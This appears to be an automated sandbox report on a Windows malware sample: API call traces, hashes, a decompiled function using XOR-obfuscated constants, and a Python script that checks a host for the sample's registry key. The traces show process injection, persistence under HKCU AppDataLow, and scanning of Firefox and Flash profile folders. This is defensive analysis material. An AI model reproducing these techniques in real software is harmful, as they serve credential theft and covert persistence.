                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513D6
                                                                                                                                          • Part of subcall function 00451370: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 00451400
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,Ini,?,?), ref: 00445995
                                                                                                                                          • Part of subcall function 00444E37: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,00454799,?,00000001,004683E0,?,?,?,00000000), ref: 00444E59
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapQueryValue$AllocateCloseFreememcpy
                                                                                                                                        • String ID: Ini
                                                                                                                                        • API String ID: 1301464996-1327165576
                                                                                                                                        • Opcode ID: e66e9fb859a22ff9e91b10358cf436248cfbf045e446e654124ef53111cf0bd9
                                                                                                                                        • Instruction ID: 315ca49c581a7323a8ea983a6086c2a4bbe8811aca3791a90d81b3f08aac49d7
                                                                                                                                        • Opcode Fuzzy Hash: e66e9fb859a22ff9e91b10358cf436248cfbf045e446e654124ef53111cf0bd9
                                                                                                                                        • Instruction Fuzzy Hash: 6B1106B5610A00EFEF149B45CC91BFE77A8EB45320F10003BF941DB252D7B99E059B69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,0046E160,00000018,00441F28,NTDLL.DLL,7250775A,00441F28,NTDLL.DLL,4772644C,00441F28,NTDLL.DLL,4C72644C,00000000,?,?,00441F28), ref: 00461E5F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy
                                                                                                                                        • String ID: NTDLL.DLL
                                                                                                                                        • API String ID: 3510742995-1613819793
                                                                                                                                        • Opcode ID: b558bffe0b4c5479b7828446a18cf82f1ffa8d02fc50de88f7d303e34f7a7efd
                                                                                                                                        • Instruction ID: 679ac28c4a929e2716b6ab79bdc696f522fbbd0703fc99c6b8229874a3f36029
                                                                                                                                        • Opcode Fuzzy Hash: b558bffe0b4c5479b7828446a18cf82f1ffa8d02fc50de88f7d303e34f7a7efd
                                                                                                                                        • Instruction Fuzzy Hash: 5F115979601114EBEB14DF57EC46CE33BE9AB827207084136E9098B271F6B16D05DB6E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,?,?,00000000,00000000), ref: 0045DF3C
                                                                                                                                        • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,?,?,00000000), ref: 0045DF83
                                                                                                                                          • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 552344955-0
                                                                                                                                        • Opcode ID: 76b69dea9580bad59473518e185424f15a22fb312abfb4cc8f9add1665eeb4f6
                                                                                                                                        • Instruction ID: 1280cc830b35023f092a47f881ab164c7ad001eb331bbb21c7590b460c828ac5
                                                                                                                                        • Opcode Fuzzy Hash: 76b69dea9580bad59473518e185424f15a22fb312abfb4cc8f9add1665eeb4f6
                                                                                                                                        • Instruction Fuzzy Hash: 1D11A372D00208ABC721DF99C844B9FB7F8EF9435AF20405EF80197241DB789E09CB54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,?,?,59935A40,00000000,0044BA4B,?), ref: 00465654
• HeapFree.KERNEL32(00000000,00000000,00000000,00000000,0044BA4B,?,?), ref: 004656B5
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Time$FileFreeHeapSystem
• String ID:
• API String ID: 892271797-0
• Opcode ID: 873f241a3cf8b48063aabc96a9a4d71a6dafb0b0e36710b1778f7531b4153283
• Instruction ID: 2d504193d724c0e73ef0d3c6378a47115e471c5ee904c6ccda087cfe8c7a9e4b
• Opcode Fuzzy Hash: 873f241a3cf8b48063aabc96a9a4d71a6dafb0b0e36710b1778f7531b4153283
• Instruction Fuzzy Hash: C5114CB5D01108EBCF00EBA1DE45BDE77BCEB04304F500566EA05E3261E7789B48DB5A
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00451370: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513A8
  • Part of subcall function 00451370: RtlAllocateHeap.NTDLL(00000000,?), ref: 004513BC
  • Part of subcall function 00451370: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513D6
  • Part of subcall function 00451370: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 00451400
• HeapFree.KERNEL32(00000000,?,?,?,Kill,?,?), ref: 0044323C
  • Part of subcall function 0045ADBF: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,00443227,00000000,00000001,?,?,?,Kill,?,?), ref: 0045ADD1
  • Part of subcall function 0045ADBF: StrChrA.SHLWAPI(?,00000020,?,00000000,00443227,00000000,00000001,?,?,?,Kill,?,?), ref: 0045ADE0
  • Part of subcall function 00443861: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 00443887
  • Part of subcall function 00443861: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00443893
  • Part of subcall function 00443861: GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess,00000000,?,00000000), ref: 004438AA
  • Part of subcall function 00443861: GetProcAddress.KERNEL32(00000000), ref: 004438B1
  • Part of subcall function 00443861: Thread32First.KERNEL32(?,0000001C), ref: 004438C1
  • Part of subcall function 00443861: CloseHandle.KERNEL32(?), ref: 00443909
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
• String ID: Kill
• API String ID: 2627809124-2803628375
• Opcode ID: dc691ec0e5eaa63d7d6d76d1f9a5e4311c21860d8268748ef179fbf9f34cc8dd
• Instruction ID: 3bf5b592444e3f215c1beded055edf4ea9129c91dd77ec271b705f3cc6690a27
• Opcode Fuzzy Hash: dc691ec0e5eaa63d7d6d76d1f9a5e4311c21860d8268748ef179fbf9f34cc8dd
• Instruction Fuzzy Hash: C101D631A00108BFAB11ABE69C85C9FFBADEB0474971000BAF80192111EAB59F04CA6A
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00451370: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513A8
  • Part of subcall function 00451370: RtlAllocateHeap.NTDLL(00000000,?), ref: 004513BC
  • Part of subcall function 00451370: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513D6
  • Part of subcall function 00451370: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 00451400
• HeapFree.KERNEL32(00000000,00000000,00000000,Scr,00000000,?,?,?,00000000,0044BBF0,0045D878,00000000,00000000), ref: 0045DA1C
  • Part of subcall function 0045ADBF: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,00443227,00000000,00000001,?,?,?,Kill,?,?), ref: 0045ADD1
  • Part of subcall function 0045ADBF: StrChrA.SHLWAPI(?,00000020,?,00000000,00443227,00000000,00000001,?,?,?,Kill,?,?), ref: 0045ADE0
  • Part of subcall function 00442520: lstrlen.KERNEL32(?,00000000,00000000,74B05520,?,?,?,00441568,0000010D,00000000,00000000), ref: 00442550
  • Part of subcall function 00442520: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00442566
  • Part of subcall function 00442520: memcpy.NTDLL(00000010,?,00000000,?,?,?,00441568,0000010D), ref: 0044259C
  • Part of subcall function 00442520: memcpy.NTDLL(00000010,00000000,00441568,?,?,?,00441568), ref: 004425B7
  • Part of subcall function 00442520: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 004425D5
  • Part of subcall function 00442520: GetLastError.KERNEL32(?,?,?,00441568), ref: 004425DF
  • Part of subcall function 00442520: HeapFree.KERNEL32(00000000,00000000,?,?,?,00441568), ref: 00442605
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
• String ID: Scr
• API String ID: 730886825-1633706383
• Opcode ID: 41403514538cb39fe4edecf98a0b48a6ef9c0f7e6b5b05f59a21838889fb11b9
• Instruction ID: f8be53c44cfe6770e3ecbcc58642be8da774725146df3639aad560dd4ca1f3b5
• Opcode Fuzzy Hash: 41403514538cb39fe4edecf98a0b48a6ef9c0f7e6b5b05f59a21838889fb11b9
• Instruction Fuzzy Hash: BE01A731E04204BADB219B91DD05FDFBBEDDF05715F00006AF901A2191F6B5AE08D66A
Uniqueness

Uniqueness Score: -1.00%

APIs
• InterlockedIncrement.KERNEL32(0046DF5C), ref: 00447BE2
  • Part of subcall function 0044976D: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00449798
  • Part of subcall function 0044976D: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 004497A5
  • Part of subcall function 0044976D: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 00449831
  • Part of subcall function 0044976D: GetModuleHandleA.KERNEL32(00000000), ref: 0044983C
  • Part of subcall function 0044976D: RtlImageNtHeader.NTDLL(00000000), ref: 00449845
  • Part of subcall function 0044976D: RtlExitUserThread.NTDLL(00000000), ref: 0044985A
• InterlockedDecrement.KERNEL32(0046DF5C), ref: 00447C06
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
• String ID:
• API String ID: 1011034841-0
• Opcode ID: 2424d9d9ca4e265630dc2d105ba4982c9b9ea0b49a0031586fe0f3be49c4b611
• Instruction ID: 55b44441a760d3601fd11addb19552480235db8308450097778df650722dc2fd
• Opcode Fuzzy Hash: 2424d9d9ca4e265630dc2d105ba4982c9b9ea0b49a0031586fe0f3be49c4b611
• Instruction Fuzzy Hash: D5E0923160C1219BAB211BB4BD48B1BA750EB1078AF004D3BF647E0151E7288C82DA9E
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00443C78: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00443CB1
  • Part of subcall function 00443C78: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00443CE7
  • Part of subcall function 00443C78: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00443CF3
  • Part of subcall function 00443C78: lstrcmpi.KERNEL32(?,00000000), ref: 00443D30
  • Part of subcall function 00443C78: StrChrA.SHLWAPI(?,0000002E), ref: 00443D39
  • Part of subcall function 00443C78: lstrcmpi.KERNEL32(?,00000000), ref: 00443D4B
  • Part of subcall function 00443C78: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00443D9C
• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000010,?,?,?,0046A5A8,0000002C,00449078,NTDLL.DLL,6547775A,00000000,00450ED7), ref: 0044F45E
  • Part of subcall function 0044C536: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 0044C55F
  • Part of subcall function 0044C536: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,004625D9,00000000,00000000,00000028,00000100), ref: 0044C581
• VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,0046A5A8,0000002C,00449078,NTDLL.DLL,6547775A,00000000,00450ED7,?,00000318), ref: 0044F4E9
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
• String ID:
• API String ID: 4138075514-0
• Opcode ID: 297157d09288b85df16844cbefeb9d11cadd49664e1b3be5759bb15eeb3ae279
• Instruction ID: cfc5d3f380ce71d092418be7f8efc29257ac728d2242655b12fefe0a8b9dc9ff
• Opcode Fuzzy Hash: 297157d09288b85df16844cbefeb9d11cadd49664e1b3be5759bb15eeb3ae279
• Instruction Fuzzy Hash: 0621E471D01229ABDF61DFA5DC80ADEBBB4BF08724F10812AF914B6250D7385A45CFA8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
			E73751FDB(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t28;
				void* _t22;		// saved copy of the ECX argument (decompiler temporary)

				_t22 = __ecx;
				_push(__ecx);		// two pushes reserve the stack slots for _v8 and _v12
				_push(__ecx);
				_t25 = 0;		// result defaults to 0 (no match)
				// Global at 0x7375414c XOR'd with an immediate: the constant is only decoded at runtime.
				if(E73751A17( &_v8,  &_v12,  *0x7375414c ^ 0x239770ca) != 0) {
					if(_v8 == 0) {
						_t28 = 0;
					} else {
						// Second XOR-decoded constant selects how the buffer in _v8 is transformed
						_t28 = E73751732(_t22, _v8,  *0x7375414c ^ 0x54b37a7c);
					}
					if(_t28 != 0) {
						_t15 = E737519DA(_t22); // executed
						_v12 = _t15 & 0x0000ffff;	// low 16 bits used as the (short) search pattern
						_t18 = StrStrIA(_t28,  &_v12); // executed; case-insensitive substring search
						if(_t18 != 0) {
							_t25 = 0x657;	// marker value returned when the pattern is found
						}
					}
					HeapFree( *0x73754110, 0, _v8);	// release the buffer obtained from E73751A17
				}
				return _t25;
			}

APIs
  • Part of subcall function 73751A17: EntryPoint.ONEROUS.TAR(?,00000000,?,?,00000000,-00000008,73751DE8), ref: 73751AA2
• StrStrIA.KERNELBASE(00000000,?,-00000008,?,?,?,00000000,?,?,?,73751DE8), ref: 73752032
• HeapFree.KERNEL32(00000000,?,-00000008,?,?,?,00000000,?,?,?,73751DE8), ref: 7375204C
Memory Dump Source
• Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
• Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp
• Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp
Similarity
• API ID: EntryFreeHeapPoint.
• String ID:
• API String ID: 1965514895-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(41564441), ref: 0044A604
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(-00000002,?,?,00000000,?,?,004440F5,00000000,00000000), ref: 0045EB51
  • Part of subcall function 0045865A: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0046E240), ref: 00458671
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: HandleInformationModuleProcessQuery
• String ID:
• API String ID: 2776635927-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0045B367
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNELBASE(?,?,0043003F,00430440,00430440,00000000,00430440,?,00430440), ref: 0043021C
Memory Dump Source
• Source File: 00000000.00000003.202248028.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00441000: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0046E088,00000000,004461B5,?,004426F5,?), ref: 0044101F
  • Part of subcall function 00441000: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0046E088,00000000,004461B5,?,004426F5,?), ref: 0044102A
  • Part of subcall function 00441000: _wcsupr.NTDLL ref: 00441037
  • Part of subcall function 00441000: lstrlenW.KERNEL32(00000000), ref: 0044103F
• ResumeThread.KERNEL32(00000004,?,004426F5,?), ref: 004461C3
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
• String ID:
• API String ID: 3646851950-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0046634E
  • Part of subcall function 0046645E: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A594,00440000), ref: 004664D7
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: ExceptionHelper2@8LoadRaise___delay
• String ID:
• API String ID: 123106877-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0046634E
  • Part of subcall function 0046645E: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A594,00440000), ref: 004664D7
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: ExceptionHelper2@8LoadRaise___delay
• String ID:
• API String ID: 123106877-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• memset.NTDLL ref: 00448EEF
  • Part of subcall function 00450EA4: memset.NTDLL ref: 00450ECA
  • Part of subcall function 00450EA4: memcpy.NTDLL ref: 00450EF2
  • Part of subcall function 00450EA4: GetLastError.KERNEL32(00000010,00000218,00466B7D,00000100,?,00000318,00000008), ref: 00450F09
  • Part of subcall function 00450EA4: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,00466B7D,00000100), ref: 00450FEC
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: ErrorLastmemset$AllocateHeapmemcpy
• String ID:
• API String ID: 4290293647-0
                                                                                                                                        • Opcode ID: 4e6c8e6127eb39a6e75dc8914ebaea744a0f6099b842a033b77e1e4ffc677546
                                                                                                                                        • Instruction ID: 67db2163e953fef9a493401794477625045386ba1b4bde4ce718a2bb6bc8e59d
                                                                                                                                        • Opcode Fuzzy Hash: 4e6c8e6127eb39a6e75dc8914ebaea744a0f6099b842a033b77e1e4ffc677546
                                                                                                                                        • Instruction Fuzzy Hash: 1001A2705053086BD7219F2ADC41B9B7BE8FF44318F10842FFC8496342DBB9D94986A5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 004464A2
                                                                                                                                          • Part of subcall function 00463F70: RegOpenKeyExA.KERNELBASE(004464BA,00000000,00000000,00020119,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,004464BA,?,80000001), ref: 00463FA9
                                                                                                                                          • Part of subcall function 00463F70: RegOpenKeyExA.ADVAPI32(004464BA,00000000,00000000,00020019,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,004464BA,?,80000001), ref: 00463FBD
                                                                                                                                          • Part of subcall function 00463F70: RegCloseKey.KERNELBASE(80000001,80000001,Client32,?,80000001,?,Software\AppDataLow\Software\Microsoft\,00000000,?,?,004464BA,?,80000001), ref: 00464006
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Open$Closememset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1685373161-0
                                                                                                                                        • Opcode ID: b4bff4396496c5d89e2bf73dfd8529cdc612eebf9d42b2c95b85b2b0fac2f144
                                                                                                                                        • Instruction ID: da74bab1ac326c85e69530c3dc2ec8876f07c38be6c020f515eb2e2a09a7dd73
                                                                                                                                        • Opcode Fuzzy Hash: b4bff4396496c5d89e2bf73dfd8529cdc612eebf9d42b2c95b85b2b0fac2f144
                                                                                                                                        • Instruction Fuzzy Hash: A7E01730140108BBEF206F16DC02F893B75AF10358F00C026BE086D262E7B6EBB49799
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%
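The RegOpenKeyExA trace above carries three constants worth reading: 80000001 is the value of HKEY_CURRENT_USER, and 00020119 / 00020019 are registry access masks that differ only in the KEY_WOW64_64KEY bit (the two call sites open the 64-bit view first, then retry without the flag). The path literal is Software\AppDataLow\Software\Microsoft\ and the string Client32 appears alongside it; the report does not show whether Client32 is a subkey or a value name. The following is an added example, not tooling from the Joe Sandbox report or code from the sample: it decodes the masks from the Windows SDK constant values and, on a Windows host, lists what sits under that key path in HKCU so an analyst can check a machine for the same artefact. The `decode_sam`, `decode_reg_open` and `inspect_appdatalow_key` names are this example's own.

```python
"""Decode the RegOpenKeyExA constants seen in the trace and, on Windows, list
the contents of the key path the sample opens. Added example; the hive and
access-mask values are the Windows SDK constants (winreg.h / winnt.h)."""
import sys

HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

# Individual rights; KEY_READ (0x20019) is a composite of the first four plus READ_CONTROL.
KEY_RIGHTS = [
    (0x0001, "KEY_QUERY_VALUE"),
    (0x0002, "KEY_SET_VALUE"),
    (0x0004, "KEY_CREATE_SUB_KEY"),
    (0x0008, "KEY_ENUMERATE_SUB_KEYS"),
    (0x0010, "KEY_NOTIFY"),
    (0x0020, "KEY_CREATE_LINK"),
    (0x0100, "KEY_WOW64_64KEY"),
    (0x0200, "KEY_WOW64_32KEY"),
    (0x00020000, "READ_CONTROL"),
    (0x00040000, "WRITE_DAC"),
    (0x00080000, "WRITE_OWNER"),
    (0x00100000, "SYNCHRONIZE"),
]
KEY_READ = 0x00020019


def decode_sam(sam):
    """Break a samDesired mask into named rights; the KEY_READ composite is named first."""
    names = []
    remaining = sam
    if sam & KEY_READ == KEY_READ:
        names.append("KEY_READ")
        remaining &= ~KEY_READ
    for bit, name in KEY_RIGHTS:
        if remaining & bit:
            names.append(name)
            remaining &= ~bit
    if remaining:  # bits we have no name for
        names.append("0x%08x" % remaining)
    return names


def decode_reg_open(hkey, sam):
    """Render (hKey, samDesired) as a readable string, e.g. 'HKEY_CURRENT_USER | KEY_READ'."""
    hive = HIVES.get(hkey, "0x%08x" % hkey)
    return hive + " | " + "|".join(decode_sam(sam))


# Path literal from the trace. "Client32" also appears in the RegCloseKey arguments,
# but the report does not say whether it is a subkey or a value, so the check
# below lists both subkeys and value names rather than assuming a layout.
APPDATALOW_PATH = r"Software\AppDataLow\Software\Microsoft"


def inspect_appdatalow_key(path=APPDATALOW_PATH):
    """Windows only: return (subkeys, value_names) under HKCU\\<path>, or None when
    the key is absent or this is not a Windows host."""
    if sys.platform != "win32":
        return None
    import winreg
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path, 0, winreg.KEY_READ) as k:
            n_sub, n_val, _ = winreg.QueryInfoKey(k)
            subs = [winreg.EnumKey(k, i) for i in range(n_sub)]
            vals = [winreg.EnumValue(k, i)[0] for i in range(n_val)]
            return subs, vals
    except OSError:
        return None


if __name__ == "__main__":
    for sam in (0x00020119, 0x00020019):
        print("RegOpenKeyExA(0x80000001, ..., 0x%08x) -> %s" % (sam, decode_reg_open(0x80000001, sam)))
    print("HKCU\\%s contents: %r" % (APPDATALOW_PATH, inspect_appdatalow_key()))
```

A clean host normally has no Software\AppDataLow\Software\Microsoft key under HKCU at all, so a non-None result from `inspect_appdatalow_key` is worth a closer look; treat the exact subkey and value names found there as host-specific rather than as a signature, since the report only shows the path and the Client32 string.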

APIs
• VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,0046A5A8,0000002C,00449078,NTDLL.DLL,6547775A,00000000,00450ED7,?,00000318), ref: 0044F4E9
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 7636e48f22f4b6ddba495283cdf86e865e4f42c104aa85b49417ae2780fa5e61
• Instruction ID: 0552aae2e700a2930e46b583532321c9f5f7a933db5a35a9e875c2af22985d9a
• Opcode Fuzzy Hash: 7636e48f22f4b6ddba495283cdf86e865e4f42c104aa85b49417ae2780fa5e61
• Instruction Fuzzy Hash: 49D01730E00619DBDB209B95DC469DFFB70BF09720F608229E960731A0C6341D56CF94
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

APIs
• lstrlenW.KERNEL32(%APPDATA%,00466A88,00000000,?,00000000), ref: 00453204
  • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,00000000,74B069A0,?,00000250,?,00000000), ref: 00456ED2
  • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 00456EDE
  • Part of subcall function 00456E86: memset.NTDLL ref: 00456F26
  • Part of subcall function 00456E86: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00456F41
  • Part of subcall function 00456E86: lstrlenW.KERNEL32(0000002C), ref: 00456F79
  • Part of subcall function 00456E86: lstrlenW.KERNEL32(?), ref: 00456F81
  • Part of subcall function 00456E86: memset.NTDLL ref: 00456FA4
  • Part of subcall function 00456E86: wcscpy.NTDLL ref: 00456FB6
  • Part of subcall function 00456E86: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00456FDC
  • Part of subcall function 00456E86: RtlEnterCriticalSection.NTDLL(?), ref: 00457011
  • Part of subcall function 00456E86: RtlLeaveCriticalSection.NTDLL(?), ref: 0045702D
  • Part of subcall function 00456E86: FindNextFileW.KERNEL32(?,00000000), ref: 00457046
  • Part of subcall function 00456E86: WaitForSingleObject.KERNEL32(00000000), ref: 00457058
  • Part of subcall function 00456E86: FindClose.KERNEL32(?), ref: 0045706D
  • Part of subcall function 00456E86: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00457081
  • Part of subcall function 00456E86: lstrlenW.KERNEL32(0000002C), ref: 004570A3
• RtlAllocateHeap.NTDLL(00000000,00000036,%APPDATA%\Mozilla\Firefox\Profiles), ref: 0045324B
• memcpy.NTDLL(00000000,%APPDATA%,00000000,?,00000000), ref: 00453260
• lstrcpyW.KERNEL32(00000000,\Macromedia\Flash Player\), ref: 00453270
  • Part of subcall function 00456E86: FindNextFileW.KERNEL32(?,00000000), ref: 00457119
  • Part of subcall function 00456E86: WaitForSingleObject.KERNEL32(00000000), ref: 0045712B
  • Part of subcall function 00456E86: FindClose.KERNEL32(?), ref: 00457146
